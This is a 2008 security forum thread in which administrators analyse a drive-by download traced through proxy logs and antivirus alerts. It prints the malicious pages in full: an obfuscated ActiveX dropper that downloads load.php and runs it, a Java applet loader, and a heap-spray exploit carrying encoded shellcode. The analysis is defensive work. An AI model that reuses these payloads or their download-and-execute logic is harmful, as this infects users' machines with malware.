Author Topic: Does anybody know this ? (Read 6806 times)

SysAdMini · September 23, 2008, 03:01:20 pm

Today found in our proxy logs.

Does anybody know edit.google.com.main.update.the-format.cn ?
It downloads some java classes and an obfuscated javascript "com.php".
I have problems to decode that script. Can anybody help ?

Code: [Select]

 23/Sep/2008:16:32:24 +0200   1357 xxx.xxx.xxx.xxx TCP_MISS/302 461 GET http://64.233.169.104.d78e324f848df9fc.managerss.cn/index.cn/ - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:25 +0200   1427 xxx.xxx.xxx.xxx TCP_MISS/200 1519 GET http://edit.google.com.main.update.the-format.cn/lis/index.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:28 +0200    604 xxx.xxx.xxx.xxx TCP_MISS/200 590 GET http://edit.google.com.main.update.the-format.cn/lis/javac.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:37 +0200   2001 xxx.xxx.xxx.xxx TCP_MISS/200 16673 GET http://edit.google.com.main.update.the-format.cn/lis/java.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:38 +0200   2252 xxx.xxx.xxx.xxx TCP_MISS/200 16673 GET http://edit.google.com.main.update.the-format.cn/lis/java.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:39 +0200   1698 xxx.xxx.xxx.xxx TCP_MISS/200 4461 GET http://edit.google.com.main.update.the-format.cn/lis/com.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:39 +0200    717 xxx.xxx.xxx.xxx TCP_MISS/404 572 GET http://edit.google.com.main.update.the-format.cn/lis/BaaaaBaa.class - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:40 +0200    558 xxx.xxx.xxx.xxx TCP_MISS/404 578 GET http://edit.google.com.main.update.the-format.cn/lis/BaaaaBaa/class.class - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:33:21 +0200    847 xxx.xxx.xxx.xxx TCP_MISS/200 4462 GET http://edit.google.com.main.update.the-format.cn/lis/com.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:33:24 +0200    655 xxx.xxx.xxx.xxx TCP_MISS/404 571 GET http://edit.google.com.main.update.the-format.cn/lis/BaaaaBaa.class - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:33:25 +0200    694 xxx.xxx.xxx.xxx TCP_MISS/404 577 GET http://edit.google.com.main.update.the-format.cn/lis/BaaaaBaa/class.class - DIRECT/200.63.48.105 text/html

Java classes were detected as

Code: [Select]

Virus/Malware: JAVA_BYTEVER.BQ
File: C:\WINNT\TEMP\jar_cache22490.tmp (Baaaaa.class)
Date/Time: 23.09.2008 16:32:40
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
---------------------------------------------------
Virus/Malware: JAVA_BYTEVER.BR
File: C:\WINNT\TEMP\jar_cache22490.tmp (BaaaaBaa.class)
Date/Time: 23.09.2008 16:32:44
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
---------------------------------------------------
Virus/Malware: TROJ_JAVA.AT
File: C:\WINNT\TEMP\jar_cache22490.tmp (Dvnny.class)
Date/Time: 23.09.2008 16:32:44
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
---------------------------------------------------
Virus/Malware: JAVA_BYTEVER.BS
File: C:\WINNT\TEMP\jar_cache22490.tmp (VaaaaaaaBaa.class)
Date/Time: 23.09.2008 16:32:44
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)

philipp · September 23, 2008, 04:06:03 pm

hi,

decoding the shellcode in com.php reveals the following url:

Code: [Select]

http://dev.aero4.cn/adpack/load.php

regards,
ph

SysAdMini · September 23, 2008, 05:24:54 pm

Thanks, philipp.

I can decode the shellcode if I only decode the first line manually,
but Malzilla can't decode the complete script automatically.

Result from the shellcode url:

Code: [Select]

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /adpack/load.php was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3 Server at dev.aero4.cn Port 80</ADDRESS>
</BODY></HTML>

bobby · September 23, 2008, 06:50:26 pm

Is there a missing part of this script?
Or is there some createControlRange() exploit?

Evaluate just the last line of the script, the one beginning with eval().
You will get just one line as a result.
What is with that z variable? Where is that one used? That's why I'm asking about if we are missing a part of the script.
Other possibility is that it gets executed by createControlRange() function, but I do not know if such exploit exists.

SysAdMini · September 23, 2008, 06:59:25 pm

Script is complete. It is enclosed in <script> tags.
A second gave the same result.

SysAdMini · September 23, 2008, 07:14:22 pm

Ok, let's play that game.

hxxp://edit.google.com.main.update.the-format.cn/lis/index.php

Code: [Select]

<html><head><meta HTTP-EQUIV='REFRESH' content='2; URL=javac.php'><script> start();
function z_sa(o,p,v){ o.setAttribute(p,v); }
function start(){
var z = document.createElement('object'); z_sa(z,'id','z');z_sa(z,'classid',"cZl#sqiZdL:qBqDM9Z6ZCZ5#5Z6Z-L6L5ZAM3L-q1Z1LDq0M-M9Z8M3ZAZ-Z0M0ZCq0M4qFZCZ2Z9MEq3#6L".replace(/[MLZq#]/g, ''));
try {
var q = z.CreateObject("mZs%xJmZl%2Z.%XJMKLdHJT%TKP%".replace(/[%ZJKd]/g, ''), ''),s = z.CreateObject("S1hdeWlDlW.DAWp1pWlWiWcKaKt1ido1nW".replace(/[1dWKD]/g, ''), ''),t = z.CreateObject("awdwowdCbP.PswtSrCePaCmS".replace(/[wSCPH]/g, ''), '');
try { 
t.type = 1;
q.open("GqEqT6".replace(/[96VqX]/g, ''),'http://edit.google.com.main.update.the-format.cn/lis/load.php',false);
eval("qE.xsXecncdc(E)X;Etx.EoXpcelnl(E)X;XtE.XWErXixtxec(lql.ErxeEsxpxolnEsxeEBEoEdxyE)l".replace(/[xXclE]/g, ''));
var name = ".0/z/P.O.z/t/tatdOmOiznP.0etxOet".replace(/[z0OPt]/g, '');
eval("tb.KSBabvBeETboKFBiElKeb(8nBaKm8eE,K2B)b;Etb.8CBl8oBsKeE(E)B;B".replace(/[Bb8KE]/g, ''));} catch(e) {}try { eval("sb.osoh#e#lEl#ebxqe#cbuEtEeE(#nqaEmoeb)o".replace(/[bqoE#]/g, ''));  } catch(e) {}} catch(e){}}</script></head></html>

hxxp://edit.google.com.main.update.the-format.cn/lis/javac.php

Code: [Select]

<applet archive="java.php" code="BaaaaBaa.class" width=1  height=1><param name="url" value="http://edit.google.com.main.update.the-format.cn/lis/load.php"></applet><meta HTTP-EQUIV="REFRESH" content="2; 
URL=com.php">

hxxp://edit.google.com.main.update.the-format.cn/lis/load.php
downloads xloader.exe
http://www.virustotal.com/analisis/7546a66e99e92c355d0aab9c12ff9bc7

hxxp://edit.google.com.main.update.the-format.cn/lis/com.php

Code: [Select]

<script>
x=unescape("%ZuT9T0s9s0s%xux9x0Z9Z0x%ZuT1p8s6pAZ%pup6s4p5sBZ%pux0Z3x8TBx%pup4p0T8xBp%xus8pBZ3T0Z%sux1Z8Z4x0T%Zux5s8Z0T5T%Tux0p0Z0p1T%xus3s3p0x0x%Zux8p9ZDT2s%Tus8s9s1p0T%Zup0p4x5Z0s%Tux5p0Z8s9T%TuZ8p9Z0p8T%xuT0sCZ5x0x%puxCp0T8Z3x%ZuT8p9Z2Z8x%ZuT8p9Z0s0T%pux0Z4s4s0Z%ZusCZ0s8x3T%xuT6p6s0T8s%sux7s8Z3xDT%Zus7xCZ0p5T%TuZ8sBTFx2s%xup8Z1TDs8Z%sup9x0sCT3x%sux0s0p0p0Z%puZ8Z9p0T0p%TuZ3T3T1Z8s%TuT8x3sDs2p%TuZ0x4ZCZ0x%TuT1s0T8s9p%xuTCs0p8s3T%Zus8x1s0T4x%puT8p0xCs3p%pus0s0p0s0x%xux8Z9Z0Z0s%Zux3s3p1x8T%pup8p9ZCp0p%Tus8p3p0T3p%Zus0T4ZCZ3s%puZ8p1Z6s6T%TuT8s8xFxBs%suZ7xCs1sET%pux8pBZFs4T%xup8Z1TDs3x%TuZ7s0sExBp%Tup0p0p1xEs%pus6x6x0Z0s%sus3p3x8sBT%Zup8x9p6x6T%TuT4s2p3x2s%TuxCs6Z4s2p%pux0x8Z0T2x%Tus6Z6x4s2s%TuZ3s2s8sBx%suZ3s1Z6T6s%Tup4T2x3x2T%xuZCT6x4Z2p%ZuZ1x4s0Z2Z%sux6s6Z4T2p%xux3Z2p8ZBZ%suT3x1s6Z6s%Zup4s2x3x2T%pus6s6x4x2Z%suxCx3s8Z1p%Zux0s1x6p0x%pux1T3T8Z9s%pux5x3Z8x9x%puZ8T9Z0Z4x%sup8s9Z1pAT%TuT0Z4T5pAp%Zus9T0Z9x0x%pup9x0T9s0Z%Zux9p0p9x0p%sus0sfZeZbs%Zup3s3T5pbx%TuT6T6xcs9p%pus8T0xbs9x%puZ8s0Z0s1T%Zupepfx3p3Z%Zusex2p4Z3p%suxepbpfpaZ%ZuTeZ8s0p5Z%Tuxfsfxexcx%supfTfpfTfZ%xus8Tbs7Zfp%puZdTfx4pes%ZuxeTfseZfp%ZuZ6x4Tepfp%Zuxep3saTfx%suT9pfx6Z4Z%suT4x2Zfx3Z%sup9TfT6T4T%puZ6Tepep7p%suTexfp0T3x%ZuZeTfsexbx%TuZ6Z4ZeZfp%suZbT9x0T3Z%puZ6Z1x8T7T%Tupep1Zas1p%TuT0s7x0T3Z%ZuZeZfp1Z1s%puxeTfTesfT%ZuTaxaZ6s6Z%puTbZ9xeZbp%TuT7p7x8T7s%xup6s5x1x1s%puT0T7xeT1s%xuxeTfs1ZfT%suxeZfpeTfp%xuxaTax6s6x%puxbZ9Zex7T%pupcpas8T7x%pus1p0s5xfZ%puZ0p7s2ZdZ%TuZexfT0pdZ%suZeZfpeZfs%suxaZap6p6T%puTbT9xes3T%Zus0T0s8p7p%xux0pfx2s1x%puZ0x7s8ZfZ%Tuxepfx3Tbp%Zusepfsexfs%xuTasaZ6T6s%suTbs9pfTfZ%Tux2xeT8x7x%Zup0pax9p6s%puT0T7s5p7p%ZuxeTfp2x9Z%TusepfTesfx%xuZaTaZ6Z6x%Tusasfxfxbx%suTds7x6sfx%Tux9paZ2pcs%xux6s6s1p5x%xuZfx7Zaxas%puZep8T0s6p%suseZfZeTep%pupbx1ZeTfZ%xup9xap6Z6s%xup6s4ZcxbT%Tupesbpasap%puxexeZ8p5T%xus6x4ZbZ6T%suxfp7ZbTaT%xup0Z7pbT9p%ZusexfZ6T4Z%puseZfTepfx%pus8Z7xbpfT%pusfp5ZdT9T%pux9xfxcT0Z%pux7x8s0Z7x%TusesfseTfs%ZuT6s6peZfZ%puTfZ3sapap%xup2sax6x4p%sux2sfs6pcT%sup6x6TbsfT%puxcpfpapax%Tus1T0p8Z7s%ZuTesfsexfT%ZusbpfpeTfT%Tupapap6p4s%sux8s5pfTbp%xusbZ6pepds%xusbsaZ6T4Z%xuZ0s7sfp7x%puZepfx8seZ%puTexfxeZfT%ZuTapaZexcZ%TuZ2s8Tcsfx%pupbs3TeTfZ%Tuxcp1s9s1p%suZ2x8Z8pap%ZuZepbxasfx%pup8Tap9x7p%ZuTeZfseTfp%sus9xap1s0s%Zux6s4xcpfx%pupep3sasaT%Zupepep8T5p%puT6x4xbp6Z%xupfZ7ZbZas%Zuxasfx0T7p%xuxepfZepfs%xus8p5pexfs%puxbs7xeZ8Z%TuTaZaxeZcs%TupdTcpcxbZ%Tupbscp3Z4x%TuT1Z0xbxcx%ZuTcxfp9xap%puxbZcsbpfZ%susaxap6Z4p%xup8s5xfT3Z%TuTbp6ZepaZ%pupbxaZ6x4x%pux0p7xfT7Z%xuxesfscpcT%TuZepfseTfZ%xupesfs8Z5s%xuT9Zap1p0Z%Zup6s4ZcsfZ%ZuZes7xasap%puTeTdp8T5p%xux6s4pbx6Z%puZfZ7ZbTaZ%TuZfpfx0x7p%TuTepfxesfZ%puZ8Z5ZeTfx%TuT6x4T1T0T%susfpfxaTax%TuZeses8s5x%xup6T4Tbx6Z%suZfs7pbxaT%ZupeZfx0x7p%suZeZfTeTfZ%supaTepeTfx%Tusbpdxbp4Z%xuT0TeZepcp%TuZ0ZeseTcs%Tup0sepepcp%Zux0ZeZescx%Zup0T3s6Zcx%puZbx5ZexbT%TuZ6Z4sbxcT%ZuT0pdT3p5Z%xuZbZdZ1s8Z%xuT0Tfx1T0T%Zux6T4ZbpaT%Zus6Z4T0x3T%pupex7T9Z2p%ZuxbZ2p6Z4Z%TupbZ9Tex3p%sup9xcT6s4Z%xux6T4xdT3T%supfp1p9ZbT%supeZcs9T7x%pusbx9Z1Zcs%suZ9Z9Z6p4Z%pupescxcpfZ%TuTdpcT1TcZ%xupaZ6s2Z6x%TuT4p2paseT%xuT2scZescs%xupdscTbZ9T%TuseT0x1x9T%TuZfTfs5x1x%pus1Tdsdp5s%suZes7x9pbp%sus2Z1p2ZeT%susepcTeT2p%Tusasfx1sdp%sup1TeZ0T4Z%sup1Z1Tdp4p%xuZ9ZaTbx1p%supbT5T0xaZ%TuT0p4Z6T4Z%pupbZ5s6p4s%xuZepcpcZbp%Tup8Z9s3p2T%puZeT3x6s4T%pup6x4xap4T%ZuZfx3pbp5Z%xux3Z2xeZcx%susepbT6p4s%xuxepcZ6p4s%Tusbs1p2pax%Tus2ZdTbp2p%supepfTes7Z%ZuZ1sbZ0p7Z%Zus1p0Z1x1s%ZuTbxaZ1p0p%xuZas3pbTds%Zusas0ZaT2s%ZupesfsaZ1T%sup7p4T6p8T%pux7Z0x7x4T%xuZ2pfZ3sap%xux6p4Z2xfT%xup7p6s6s5Z%Tus6T1p2pep%Tup7T2Z6p5T%Tus3T4x6Zfs%sus6Z3T2sex%xuZ2pfp6xex%pus6p4s6p1T%pup6x1s7Z0x%xup6pbx6T3Z%Tux6xcx2ZfZ%Zus6x1Z6TfZ%pux2Tes6x4T%puZ6T8p7Z0T%xup0s0s7x0T%suT0Z0x0Z0p".replace(/[pZsTx]/g, ''));
tu=unescape("%IuI0GdI0IdU%8uW08dG0IdG".replace(/[8WGIU]/g, ''));
var memz=parseInt("0OxWd@0Ad@0vdA0Wdv".replace(/[vAOW@]/g, ''));
while(tu.length<0x40000) tu+=tu;  tu=tu.substring(0,parseInt("0vxv3vfvfaev48".replace(/[8mlav]/g, ''))-x.length); o=new Array(); for(i=0;i<450;i++) o[i]=tu+x;z=Math.ceil(memz);
eval("zS=8d#oSc3u8mqe3nqt#.3s8c#r#iSp8tSs#[#03]S.3c#rqeSa#t#eqC8oSn3tqrSoSlSR#a#n8g#eq(q)q.3l#e8nqgStqh8".replace(/[q#8S3]/g, ''));
</script>

Did I miss something ?

bobby · September 23, 2008, 07:25:33 pm

I do not see anything more than you did see.
It looks strange that a 3-years old exploit is used:
http://www.google.com/search?hl=en&q=createControlRange+exploit&btnG=Google+Search&aq=f&oq=

sowhat-x · September 23, 2008, 07:50:37 pm

Yeah,I've also seen these ".class" files couple of times in the past,
as philipp already said,I think they're part of a ready-made exploit kit...

SysAdMini · September 23, 2008, 08:01:11 pm

Quote from: sowhat-x on September 23, 2008, 07:50:37 pm

Yeah,I've also seen these ".class" files couple of times in the past,
as philipp already said,I think they're part of a ready-made exploit kit...

I've seen a lot of machines in the last days where the virus scanner detects suspicious java classes.
I receive detection notifications from all machines in our company network. The amount of JAVA_BYTEVER
has grown.

Author Topic: Does anybody know this ? (Read 6806 times)

SysAdMini

Does anybody know this ?

philipp

Re: Does anybody know this ?

SysAdMini

Re: Does anybody know this ?

bobby

Re: Does anybody know this ?

SysAdMini

Re: Does anybody know this ?

SysAdMini

Re: Does anybody know this ?

bobby

Re: Does anybody know this ?

sowhat-x

Re: Does anybody know this ?

SysAdMini

Re: Does anybody know this ?